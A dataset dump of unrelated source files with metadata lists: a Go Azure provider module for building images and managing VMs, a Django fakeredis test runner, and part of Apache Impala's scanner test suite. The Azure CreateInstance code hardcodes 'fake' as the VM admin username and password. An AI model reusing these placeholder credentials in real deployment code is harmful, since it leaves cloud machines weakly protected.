authr, err = a.getAuthorizerForResource(a.Environment().ResourceManagerEndpoint)
if err == nil {
// cache
armAuthorizer = authr
} else {
// clear cache
armAuthorizer = nil
}
return armAuthorizer, err
}
func (a *Azure) getImagesClient() compute.ImagesClient {
vmClient := compute.NewImagesClientWithBaseURI(compute.DefaultBaseURI, a.subID)
authr, _ := a.GetResourceManagementAuthorizer()
vmClient.Authorizer = authr
vmClient.AddToUserAgent(userAgent)
return vmClient
}
func (a *Azure) getVMClient() compute.VirtualMachinesClient {
vmClient := compute.NewVirtualMachinesClient(a.subID)
authr, _ := a.GetResourceManagementAuthorizer()
vmClient.Authorizer = authr
vmClient.AddToUserAgent(userAgent)
return vmClient
}
func (a *Azure) getVMExtensionsClient() compute.VirtualMachineExtensionsClient {
extClient := compute.NewVirtualMachineExtensionsClient(a.subID)
authr, _ := a.GetResourceManagementAuthorizer()
extClient.Authorizer = authr
extClient.AddToUserAgent(userAgent)
return extClient
}
func (a *Azure) getLocation(ctx *Context) string {
c := ctx.config
location := c.CloudConfig.Zone
if location == "" {
location = a.locationDefault
}
if location == "" {
fmt.Println("Error: a location must be set via either the Zone attribute in CloudConfig or the AZURE_LOCATION_DEFAULT environment variable.")
os.Exit(1)
}
return location
}
// GetVM gets the specified VM info
func (a *Azure) GetVM(ctx context.Context, vmName string) (compute.VirtualMachine, error) {
vmClient := a.getVMClient()
return vmClient.Get(ctx, a.groupName, vmName, compute.InstanceView)
}
// RestartVM restarts the selected VM
func (a *Azure) RestartVM(ctx context.Context, vmName string) (osr autorest.Response, err error) {
vmClient := a.getVMClient()
future, err := vmClient.Restart(ctx, a.groupName, vmName)
if err != nil {
return osr, fmt.Errorf("cannot restart vm: %v", err)
}
err = future.WaitForCompletionRef(ctx, vmClient.Client)
if err != nil {
return osr, fmt.Errorf("cannot get the vm restart future response: %v", err)
}
return future.Result(vmClient)
}
func (a *Azure) getArchiveName(ctx *Context) string {
return ctx.config.CloudConfig.ImageName + ".tar.gz"
}
func (a *Azure) customizeImage(ctx *Context) (string, error) {
imagePath := ctx.config.RunConfig.Imagename
symlink := filepath.Join(filepath.Dir(imagePath), "disk.raw")
if _, err := os.Lstat(symlink); err == nil {
if err := os.Remove(symlink); err != nil {
return "", fmt.Errorf("failed to unlink: %+v", err)
}
}
err := os.Link(imagePath, symlink)
if err != nil {
return "", err
}
archPath := filepath.Join(filepath.Dir(imagePath), a.getArchiveName(ctx))
files := []string{symlink}
err = createArchive(archPath, files)
if err != nil {
return "", err
}
return archPath, nil
}
// BuildImage to be upload on Azure
func (a *Azure) BuildImage(ctx *Context) (string, error) {
c := ctx.config
err := BuildImage(*c)
if err != nil {
return "", err
}
return a.customizeImage(ctx)
}
// BuildImageWithPackage to upload on Azure
func (a *Azure) BuildImageWithPackage(ctx *Context, pkgpath string) (string, error) {
c := ctx.config
err := BuildImageFromPackage(pkgpath, *c)
if err != nil {
return "", err
}
return a.customizeImage(ctx)
}
// Initialize Azure related things
func (a *Azure) Initialize() error {
a.Storage = &AzureStorage{}
subID := os.Getenv("AZURE_SUBSCRIPTION_ID")
if subID != "" {
a.subID = subID
}
locationDefault := os.Getenv("AZURE_LOCATION_DEFAULT")
if locationDefault != "" {
a.locationDefault = locationDefault
}
tenantID := os.Getenv("AZURE_TENANT_ID")
if tenantID != "" {
a.tenantID = tenantID
}
clientID := os.Getenv("AZURE_CLIENT_ID")
if clientID != "" {
a.clientID = clientID
}
clientSecret := os.Getenv("AZURE_CLIENT_SECRET")
if clientSecret != "" {
a.clientSecret = clientSecret
}
groupName := os.Getenv("AZURE_BASE_GROUP_NAME")
if groupName != "" {
a.groupName = groupName
}
return nil
}
// CreateImage - Creates image on Azure using nanos images
func (a *Azure) CreateImage(ctx *Context) error {
imagesClient := a.getImagesClient()
c := ctx.config
imgName := c.CloudConfig.ImageName
bucket := c.CloudConfig.BucketName
region := a.getLocation(ctx)
container := "quickstart-nanos"
disk := c.CloudConfig.ImageName + ".vhd"
uri := "https://" + bucket + ".blob.core.windows.net/" + container + "/" + disk
imageParams := compute.Image{
Location: to.StringPtr(region),
ImageProperties: &compute.ImageProperties{
StorageProfile: &compute.ImageStorageProfile{
OsDisk: &compute.ImageOSDisk{
OsType: compute.Linux,
BlobURI: to.StringPtr(uri),
OsState: compute.Generalized,
},
},
HyperVGeneration: compute.HyperVGenerationTypesV1,
},
}
res, err := imagesClient.CreateOrUpdate(context.TODO(), a.groupName, imgName, imageParams)
if err != nil {
fmt.Println(err)
}
fmt.Printf("%+v", res)
return nil
}
// GetImages return all images for azure
func (a *Azure) GetImages(ctx *Context) ([]CloudImage, error) {
var cimages []CloudImage
imagesClient := a.getImagesClient()
images, err := imagesClient.List(context.TODO())
if err != nil {
fmt.Println(err)
}
imgs := images.Values()
for _, image := range imgs {
cImage := CloudImage{
Name: *image.Name,
Status: *(*image.ImageProperties).ProvisioningState,
}
cimages = append(cimages, cImage)
}
return cimages, nil
}
// ListImages lists images on azure
func (a *Azure) ListImages(ctx *Context) error {
cimages, err := a.GetImages(ctx)
if err != nil {
return err
}
table := tablewriter.NewWriter(os.Stdout)
table.SetHeader([]string{"Name", "Status", "Created"})
table.SetHeaderColor(
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor})
table.SetRowLine(true)
for _, image := range cimages {
var row []string
row = append(row, image.Name)
row = append(row, image.Status)
row = append(row, "")
table.Append(row)
}
table.Render()
return nil
}
// DeleteImage deletes image from Azure
func (a *Azure) DeleteImage(ctx *Context, imagename string) error {
imagesClient := a.getImagesClient()
fut, err := imagesClient.Delete(context.TODO(), a.groupName, imagename)
if err != nil {
fmt.Println(err)
}
fmt.Printf("%+v", fut)
return nil
}
// SyncImage syncs image from provider to another provider
func (a *Azure) SyncImage(config *Config, target Provider, image string) error {
fmt.Println("not yet implemented")
return nil
}
// CreateInstance - Creates instance on azure Platform
//
// this is kind of a pita
// you have to create the following:
// {vnet, nsg, subnet, ip, nic} before creating the vm
//
// unfortunately this is going to take some serious re-factoring later
// on w/these massive assumptions being put into place
func (a *Azure) CreateInstance(ctx *Context) error {
username := "fake"
password := "fake"
c := ctx.config
bucket := c.CloudConfig.BucketName
if bucket == "" {
bucket = os.Getenv("AZURE_STORAGE_ACCOUNT")
}
if bucket == "" {
fmt.Println("AZURE_STORAGE_ACCOUNT should be set otherwise logs can not be retrieved.")
os.Exit(1)
}
location := a.getLocation(ctx)
debug := false
vmName := ctx.config.CloudConfig.ImageName
fmt.Printf("spinning up:\t%s\n", vmName)
// create virtual network
vnet, err := a.CreateVirtualNetwork(context.TODO(), location, vmName)
if err != nil {
fmt.Println(err)
}
if debug {
fmt.Printf("%+v\n", vnet)
}
// create nsg
nsg, err := a.CreateNetworkSecurityGroup(context.TODO(), location, vmName)
if err != nil {
fmt.Println(err)
}
if debug {
fmt.Printf("%+v\n", nsg)
}
// create subnet
subnet, err := a.CreateSubnetWithNetworkSecurityGroup(context.TODO(), vmName, vmName, "10.0.0.0/24", vmName)
if err != nil {
fmt.Println(err)
}
if debug {
fmt.Printf("%+v\n", subnet)
}
// create ip
ip, err := a.CreatePublicIP(context.TODO(), location, vmName)
if err != nil {
fmt.Println(err)
}
if debug {
fmt.Printf("%+v\n", ip)
}
// create nic
// pass vnet, subnet, ip, nicname
nic, err := a.CreateNIC(context.TODO(), location, vmName, vmName, vmName, vmName, vmName)
if err != nil {
fmt.Println(err)
}
var sshKeyData string
sshKeyData = fakepubkey
nctx := context.TODO()
fmt.Println("creating the vm - this can take a few minutes - you can ctrl-c this after a bit")
fmt.Println("there is a known issue that prevents the deploy from ever being 'done'")
vmClient := a.getVMClient()
future, err := vmClient.CreateOrUpdate(
nctx,
a.groupName,
vmName,
compute.VirtualMachine{
Location: to.StringPtr(location),
VirtualMachineProperties: &compute.VirtualMachineProperties{
HardwareProfile: &compute.HardwareProfile{
VMSize: compute.VirtualMachineSizeTypesStandardA1V2,
},
StorageProfile: &compute.StorageProfile{
ImageReference: &compute.ImageReference{
ID: to.StringPtr("/subscriptions/" + a.subID + "/resourceGroups/" + a.groupName + "/providers/Microsoft.Compute/images/" + vmName),
},
},
DiagnosticsProfile: &compute.DiagnosticsProfile{
BootDiagnostics: &compute.BootDiagnostics{
Enabled: to.BoolPtr(true),
StorageURI: to.StringPtr("https://" + bucket + ".blob.core.windows.net/"),
},
},
OsProfile: &compute.OSProfile{
ComputerName: to.StringPtr(vmName),
AdminUsername: to.StringPtr(username),
AdminPassword: to.StringPtr(password),
LinuxConfiguration: &compute.LinuxConfiguration{
SSH: &compute.SSHConfiguration{
PublicKeys: &[]compute.SSHPublicKey{
{
Path: to.StringPtr(
fmt.Sprintf("/home/%s/.ssh/authorized_keys",
username)),
KeyData: to.StringPtr(sshKeyData),
},
},
},
},
},
NetworkProfile: &compute.NetworkProfile{
NetworkInterfaces: &[]compute.NetworkInterfaceReference{
{
ID: nic.ID,
NetworkInterfaceReferenceProperties: &compute.NetworkInterfaceReferenceProperties{
Primary: to.BoolPtr(true),
},
},
},
},
},
},
)
if err != nil {
fmt.Printf("cannot create vm: %v\n", err.Error())
os.Exit(1)
}
err = future.WaitForCompletionRef(nctx, vmClient.Client)
if err != nil {
fmt.Printf("cannot get the vm create or update future response: %v\n", err.Error())
os.Exit(1)
}
vm, err := future.Result(vmClient)
if err != nil {
fmt.Println(err)
}
fmt.Printf("%+v\n", vm)
return nil
}
// GetInstanceByID returns the instance with the id passed by argument if it exists
func (a *Azure) GetInstanceByID(ctx *Context, id string) (*CloudInstance, error) {
vmClient := a.getVMClient()
vm, err := vmClient.Get(context.TODO(), a.groupName, id, compute.InstanceView)
if err != nil {
return nil, err
}
return a.convertToCloudInstance(&vm), nil
}
// GetInstances return all instances on Azure
func (a *Azure) GetInstances(ctx *Context) ([]CloudInstance, error) {
var cinstances []CloudInstance
vmClient := a.getVMClient()
vmlist, err := vmClient.List(context.TODO(), a.groupName)
if err != nil {
fmt.Println(err)
}
instances := vmlist.Values()
for _, instance := range instances {
cinstance := a.convertToCloudInstance(&instance)
cinstances = append(cinstances, *cinstance)
}
return cinstances, nil
}
func (a *Azure) convertToCloudInstance(instance *compute.VirtualMachine) *CloudInstance {
cinstance := CloudInstance{
Name: *instance.Name,
}
privateIP := ""
publicIP := ""
if instance.VirtualMachineProperties != nil {
nifs := *((*(*instance.VirtualMachineProperties).NetworkProfile).NetworkInterfaces)
for i := 0; i < len(nifs); i++ {
nicClient := a.getNicClient()
nic, err := nicClient.Get(context.TODO(), a.groupName, cinstance.Name, "")
if err != nil {
fmt.Println(err)
}
if nic.InterfacePropertiesFormat != nil {
ipconfig := *(*nic.InterfacePropertiesFormat).IPConfigurations
for x := 0; x < len(ipconfig); x++ {
format := *ipconfig[x].InterfaceIPConfigurationPropertiesFormat
privateIP = *format.PrivateIPAddress
ipClient := a.getIPClient()
pubip, err := ipClient.Get(context.TODO(), a.groupName, cinstance.Name, "")
if err != nil {
fmt.Println(err)
}
publicIP = *(*pubip.PublicIPAddressPropertiesFormat).IPAddress
}
}
}
}
cinstance.PrivateIps = []string{privateIP}
cinstance.PublicIps = []string{publicIP}
return &cinstance
}
// ListInstances lists instances on Azure
func (a *Azure) ListInstances(ctx *Context) error {
cinstances, err := a.GetInstances(ctx)
if err != nil {
return err
}
table := tablewriter.NewWriter(os.Stdout)
table.SetHeader([]string{"Name", "Status", "Created", "Private Ips", "Public Ips"})
table.SetHeaderColor(
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor})
table.SetRowLine(true)
for _, instance := range cinstances {
var rows []string
rows = append(rows, instance.Name)
rows = append(rows, "")
rows = append(rows, "")
rows = append(rows, strings.Join(instance.PrivateIps, ","))
rows = append(rows, strings.Join(instance.PrivateIps, ","))
table.Append(rows)
}
table.Render()
return nil
}
// DeleteInstance deletes instance from Azure
func (a *Azure) DeleteInstance(ctx *Context, instancename string) error {
fmt.Println("un-implemented")
return nil
}
// StartInstance starts an instance in Azure
func (a *Azure) StartInstance(ctx *Context, instancename string) error {
fmt.Println("un-implemented")
vmClient := a.getVMClient()
future, err := vmClient.Start(context.TODO(), a.groupName, instancename)
if err != nil {
fmt.Printf("cannot start vm: %v\n", err.Error())
os.Exit(1)
}
err = future.WaitForCompletionRef(context.TODO(), vmClient.Client)
if err != nil {
fmt.Printf("cannot get the vm start future response: %v\n", err.Error())
os.Exit(1)
}
return nil
}
// StopInstance deletes instance from Azure
func (a *Azure) StopInstance(ctx *Context, instancename string) error {
vmClient := a.getVMClient()
// skipShutdown parameter is optional, we are taking its default
// value here
future, err := vmClient.PowerOff(context.TODO(), a.groupName, instancename, nil)
if err != nil {
fmt.Printf("cannot power off vm: %v\n", err.Error())
os.Exit(1)
}
err = future.WaitForCompletionRef(context.TODO(), vmClient.Client)
if err != nil {
fmt.Printf("cannot get the vm power off future response: %v\n", err.Error())
os.Exit(1)
}
fmt.Println("un-implemented")
return nil
}
// PrintInstanceLogs writes instance logs to console
func (a *Azure) PrintInstanceLogs(ctx *Context, instancename string, watch bool) error {
l, err := a.GetInstanceLogs(ctx, instancename)
if err != nil {
return err
}
fmt.Printf(l)
return nil
}
// GetInstanceLogs gets instance related logs
func (a *Azure) GetInstanceLogs(ctx *Context, instancename string) (string, error) {
// this is basically 2 calls
// 1) grab the log location
// 2) grab it from storage
accountName, accountKey := os.Getenv("AZURE_STORAGE_ACCOUNT"), os.Getenv("AZURE_STORAGE_ACCESS_KEY")
if len(accountName) == 0 || len(accountKey) == 0 {
fmt.Println("Either the AZURE_STORAGE_ACCOUNT or AZURE_STORAGE_ACCESS_KEY environment variable is not set")
}
credential, err := azblob.NewSharedKeyCredential(accountName, accountKey)
if err != nil {
fmt.Printf("Invalid credentials with error: %s\n", err.Error())
}
p := azblob.NewPipeline(credential, azblob.PipelineOptions{})
URL, _ := url.Parse(
fmt.Sprintf("https://%s.blob.core.windows.net/", accountName))
containerURL := azblob.NewContainerURL(*URL, p)
vmName := instancename
vmClient := a.getVMClient()
vm, err := vmClient.Get(context.TODO(), a.groupName, vmName, compute.InstanceView)
if err != nil {
fmt.Println(err)
os.Exit(1)
}
// this is unique per vm || per boot?
vmid := to.String(vm.VMID)
// this has a unique expected format apparently
// the first part of the name in the uri is capped at 10 chars but
// not the 2nd part?
firstName := strings.ReplaceAll(vmName, "-", "")
if len(firstName) > 10 {
firstName = firstName[0:9]
}
fname := "bootdiagnostics" + "-" + firstName + "-" + vmid + "/" + vmName + "." + vmid +
".serialconsole.log"
blobURL := containerURL.NewBlockBlobURL(fname)
get, err := blobURL.Download(context.TODO(), 0, 0, azblob.BlobAccessConditions{}, false)
if err != nil {
return "", err
}
downloadedData := &bytes.Buffer{}
reader := get.Body(azblob.RetryReaderOptions{})
downloadedData.ReadFrom(reader)
reader.Close()
return downloadedData.String(), nil
}
// ResizeImage is not supported on azure.
func (a *Azure) ResizeImage(ctx *Context, imagename string, hbytes string) error {
return fmt.Errorf("Operation not supported")
}
// GetStorage returns storage interface for cloud provider
func (a *Azure) GetStorage() Storage {
return a.Storage
}
|
[
"\"AZURE_SUBSCRIPTION_ID\"",
"\"AZURE_LOCATION_DEFAULT\"",
"\"AZURE_TENANT_ID\"",
"\"AZURE_CLIENT_ID\"",
"\"AZURE_CLIENT_SECRET\"",
"\"AZURE_BASE_GROUP_NAME\"",
"\"AZURE_STORAGE_ACCOUNT\"",
"\"AZURE_STORAGE_ACCOUNT\"",
"\"AZURE_STORAGE_ACCESS_KEY\""
] |
[] |
[
"AZURE_LOCATION_DEFAULT",
"AZURE_BASE_GROUP_NAME",
"AZURE_STORAGE_ACCOUNT",
"AZURE_STORAGE_ACCESS_KEY",
"AZURE_CLIENT_ID",
"AZURE_CLIENT_SECRET",
"AZURE_TENANT_ID",
"AZURE_SUBSCRIPTION_ID"
] |
[]
|
["AZURE_LOCATION_DEFAULT", "AZURE_BASE_GROUP_NAME", "AZURE_STORAGE_ACCOUNT", "AZURE_STORAGE_ACCESS_KEY", "AZURE_CLIENT_ID", "AZURE_CLIENT_SECRET", "AZURE_TENANT_ID", "AZURE_SUBSCRIPTION_ID"]
|
go
| 8 | 0 | |
tests/runtests-fakeredis.py
|
# -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, '..')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_fakeredis")
if __name__ == "__main__":
from django.core.management import execute_from_command_line
args = sys.argv
args.insert(1, "test")
if len(args) == 2:
args.insert(2, "redis_backend_testapp")
args.insert(3, "hashring_test")
execute_from_command_line(args)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
tests/query_test/test_scanners.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# This test suite validates the scanners by running queries against ALL file formats and
# their permutations (e.g. compression codec/compression type). This works by exhaustively
# generating the table format test vectors for this specific test suite. This way, other
# tests can run with the normal exploration strategy and the overall test runtime doesn't
# explode.
import os
import pytest
import random
import re
import tempfile
from copy import deepcopy
from parquet.ttypes import ConvertedType
from subprocess import check_call
from testdata.common import widetable
from tests.common.file_utils import create_table_and_copy_files
from tests.common.impala_test_suite import ImpalaTestSuite, LOG
from tests.common.skip import (
SkipIf,
SkipIfS3,
SkipIfGCS,
SkipIfABFS,
SkipIfADLS,
SkipIfEC,
SkipIfHive2,
SkipIfHive3,
SkipIfIsilon,
SkipIfLocal,
SkipIfNotHdfsMinicluster)
from tests.common.test_dimensions import (
create_single_exec_option_dimension,
create_exec_option_dimension,
create_uncompressed_text_dimension)
from tests.common.file_utils import (
create_table_from_parquet,
create_table_and_copy_files)
from tests.common.test_result_verifier import (
QueryTestResult,
parse_result_rows)
from tests.common.test_vector import ImpalaTestDimension
from tests.util.filesystem_utils import IS_HDFS, WAREHOUSE, get_fs_path
from tests.util.hdfs_util import NAMENODE
from tests.util.get_parquet_metadata import get_parquet_metadata
from tests.util.parse_util import get_bytes_summary_stats_counter
from tests.util.test_file_parser import QueryTestSectionReader
# Test scanners with denial of reservations at varying frequency. This will affect the
# number of scanner threads that can be spun up.
DEBUG_ACTION_DIMS = [None,
'-1:OPEN:[email protected]',
'-1:OPEN:[email protected]']
# Trigger injected soft limit failures when scanner threads check memory limit.
DEBUG_ACTION_DIMS.append('HDFS_SCANNER_THREAD_CHECK_SOFT_MEM_LIMIT:[email protected]')
MT_DOP_VALUES = [0, 1, 4]
class TestScannersAllTableFormats(ImpalaTestSuite):
BATCH_SIZES = [0, 1, 16]
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScannersAllTableFormats, cls).add_test_dimensions()
if cls.exploration_strategy() == 'core':
# The purpose of this test is to get some base coverage of all the file formats.
# Even in 'core', we'll test each format by using the pairwise strategy.
cls.ImpalaTestMatrix.add_dimension(cls.create_table_info_dimension('pairwise'))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('batch_size', *TestScannersAllTableFormats.BATCH_SIZES))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('debug_action', *DEBUG_ACTION_DIMS))
def test_scanners(self, vector):
new_vector = deepcopy(vector)
# Copy over test dimensions to the matching query options.
new_vector.get_value('exec_option')['batch_size'] = vector.get_value('batch_size')
new_vector.get_value('exec_option')['debug_action'] = vector.get_value('debug_action')
self.run_test_case('QueryTest/scanners', new_vector)
def test_many_nulls(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
# manynulls table not loaded for HBase
pytest.skip()
# Copy over test dimensions to the matching query options.
new_vector = deepcopy(vector)
new_vector.get_value('exec_option')['batch_size'] = vector.get_value('batch_size')
new_vector.get_value('exec_option')['debug_action'] = vector.get_value('debug_action')
self.run_test_case('QueryTest/scanners-many-nulls', new_vector)
def test_hdfs_scanner_profile(self, vector):
if vector.get_value('table_format').file_format in ('kudu', 'hbase') or \
vector.get_value('exec_option')['num_nodes'] != 0:
pytest.skip()
self.run_test_case('QueryTest/hdfs_scanner_profile', vector)
def test_string_escaping(self, vector):
"""Test handling of string escape sequences."""
if vector.get_value('table_format').file_format == 'rc':
# IMPALA-7778: RCFile scanner incorrectly ignores escapes for now.
self.run_test_case('QueryTest/string-escaping-rcfile-bug', vector)
else:
self.run_test_case('QueryTest/string-escaping', vector)
# Test all the scanners with a simple limit clause. The limit clause triggers
# cancellation in the scanner code paths.
class TestScannersAllTableFormatsWithLimit(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScannersAllTableFormatsWithLimit, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(ImpalaTestDimension('mt_dop', *MT_DOP_VALUES))
def test_limit(self, vector):
vector.get_value('exec_option')['abort_on_error'] = 1
self._test_limit(vector)
# IMPALA-3337: when continuing on error, the error log should not show errors
# (e.g. "Cancelled").
vector.get_value('exec_option')['abort_on_error'] = 0
self._test_limit(vector)
def _test_limit(self, vector):
# Use a small batch size so changing the limit affects the timing of cancellation
vector.get_value('exec_option')['batch_size'] = 100
iterations = 50
query_template = "select * from alltypes limit %s"
for i in range(1, iterations):
# Vary the limit to vary the timing of cancellation
limit = (i * 100) % 1001 + 1
query = query_template % limit
result = self.execute_query(query, vector.get_value('exec_option'),
table_format=vector.get_value('table_format'))
assert len(result.data) == limit
# IMPALA-3337: The error log should be empty.
assert not result.log
class TestScannersMixedTableFormats(ImpalaTestSuite):
BATCH_SIZES = [0, 1, 16]
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScannersMixedTableFormats, cls).add_test_dimensions()
# Only run with a single dimension format, since the table includes mixed formats.
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('batch_size', *TestScannersAllTableFormats.BATCH_SIZES))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('debug_action', *DEBUG_ACTION_DIMS))
cls.ImpalaTestMatrix.add_dimension(ImpalaTestDimension('mt_dop', *MT_DOP_VALUES))
def test_mixed_format(self, vector):
new_vector = deepcopy(vector)
new_vector.get_value('exec_option')['batch_size'] = vector.get_value('batch_size')
new_vector.get_value('exec_option')['debug_action'] = vector.get_value('debug_action')
self.run_test_case('QueryTest/mixed-format', new_vector)
# Test case to verify the scanners work properly when the table metadata (specifically the
# number of columns in the table) does not match the number of columns in the data file.
class TestUnmatchedSchema(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestUnmatchedSchema, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension())
# Avro has a more advanced schema evolution process which is covered in more depth
# in the test_avro_schema_evolution test suite.
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format != 'avro')
def _create_test_table(self, vector, unique_database):
"""
Creates the test table
Cannot be done in a setup method because we need access to the current test vector
"""
file_format = vector.get_value('table_format').file_format
if file_format == 'orc':
# TODO: Enable this test on non-HDFS filesystems once IMPALA-9365 is resolved.
if not IS_HDFS: pytest.skip()
self.run_stmt_in_hive(
"create table {0}.jointbl_test like functional.jointbl "
"stored as orc".format(unique_database))
self.run_stmt_in_hive(
'insert into {0}.jointbl_test '
'select * from functional_orc_def.jointbl'.format(unique_database))
self.execute_query_using_client(self.client,
'invalidate metadata {0}.jointbl_test'.format(unique_database),
vector)
else:
self.execute_query_using_client(self.client,
"create external table {0}.jointbl_test like jointbl".format(
unique_database), vector)
# Update the location of the new table to point the same location as the old table
location = self._get_table_location('jointbl', vector)
self.execute_query_using_client(self.client,
"alter table {0}.jointbl_test set location '{1}'".format(
unique_database, location), vector)
def test_unmatched_schema(self, vector, unique_database):
if vector.get_value('table_format').file_format == 'kudu':
pytest.xfail("IMPALA-2890: Missing Kudu DDL support")
table_format = vector.get_value('table_format')
# jointbl has no columns with unique values. When loaded in hbase, the table looks
# different, as hbase collapses duplicates.
if table_format.file_format == 'hbase':
pytest.skip()
self._create_test_table(vector, unique_database)
self.run_test_case('QueryTest/test-unmatched-schema', vector, use_db=unique_database)
# Tests that scanners can read a single-column, single-row, 10MB table
class TestWideRow(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestWideRow, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_exec_option_dimension(debug_action_options=DEBUG_ACTION_DIMS))
# I can't figure out how to load a huge row into hbase
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format != 'hbase')
def test_wide_row(self, vector):
if vector.get_value('table_format').file_format == 'kudu':
pytest.xfail("KUDU-666: Kudu support for large values")
new_vector = deepcopy(vector)
# Use a 5MB scan range, so we will have to perform 5MB of sync reads
new_vector.get_value('exec_option')['max_scan_range_length'] = 5 * 1024 * 1024
# We need > 10 MB of memory because we're creating extra buffers:
# - 10 MB table / 5 MB scan range = 2 scan ranges, each of which may allocate ~20MB
# - Sync reads will allocate ~5MB of space
# The 100MB value used here was determined empirically by raising the limit until the
# query succeeded for all file formats -- I don't know exactly why we need this much.
# TODO: figure out exact breakdown of memory usage (IMPALA-681)
new_vector.get_value('exec_option')['mem_limit'] = 100 * 1024 * 1024
# Specify that the query should able to handle 10 MB MAX_ROW_SIZE.
new_vector.get_value('exec_option')['max_row_size'] = 10 * 1024 * 1024
self.run_test_case('QueryTest/wide-row', new_vector)
class TestWideTable(ImpalaTestSuite):
# TODO: expand this to more rows when we have the capability
NUM_COLS = [250, 500, 1000]
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestWideTable, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_exec_option_dimension(debug_action_options=DEBUG_ACTION_DIMS))
cls.ImpalaTestMatrix.add_dimension(ImpalaTestDimension("num_cols", *cls.NUM_COLS))
# To cut down on test execution time, only run in exhaustive.
if cls.exploration_strategy() != 'exhaustive':
cls.ImpalaTestMatrix.add_constraint(lambda v: False)
def test_wide_table(self, vector):
if vector.get_value('table_format').file_format == 'kudu':
pytest.xfail("IMPALA-3718: Extend Kudu functional test support")
NUM_COLS = vector.get_value('num_cols')
# Due to the way HBase handles duplicate row keys, we have different number of
# rows in HBase tables compared to HDFS tables.
NUM_ROWS = 10 if vector.get_value('table_format').file_format != 'hbase' else 2
DB_NAME = QueryTestSectionReader.get_db_name(vector.get_value('table_format'))
TABLE_NAME = "%s.widetable_%s_cols" % (DB_NAME, NUM_COLS)
result = self.client.execute("select count(*) from %s " % TABLE_NAME)
assert result.data == [str(NUM_ROWS)]
expected_result = widetable.get_data(NUM_COLS, NUM_ROWS, quote_strings=True)
result = self.client.execute("select * from %s" % TABLE_NAME)
if vector.get_value('table_format').file_format == 'hbase':
assert len(result.data) == NUM_ROWS
return
types = result.column_types
labels = result.column_labels
expected = QueryTestResult(expected_result, types, labels, order_matters=False)
actual = QueryTestResult(parse_result_rows(result), types, labels,
order_matters=False)
assert expected == actual
class TestHudiParquet(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestHudiParquet, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_exec_option_dimension(debug_action_options=DEBUG_ACTION_DIMS))
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format == 'parquet')
def test_hudiparquet(self, vector):
self.run_test_case('QueryTest/hudi-parquet', vector)
class TestIceberg(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestIceberg, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_exec_option_dimension(debug_action_options=DEBUG_ACTION_DIMS))
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format == 'parquet')
def test_iceberg_query(self, vector):
self.run_test_case('QueryTest/iceberg-query', vector)
def test_iceberg_profile(self, vector, unique_database):
self.run_test_case('QueryTest/iceberg-profile', vector, use_db=unique_database)
class TestParquet(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestParquet, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_exec_option_dimension(debug_action_options=DEBUG_ACTION_DIMS))
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format == 'parquet')
def test_parquet(self, vector):
self.run_test_case('QueryTest/parquet', vector)
def test_corrupt_files(self, vector):
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['num_nodes'] # .test file sets num_nodes
new_vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/parquet-continue-on-error', new_vector)
new_vector.get_value('exec_option')['abort_on_error'] = 1
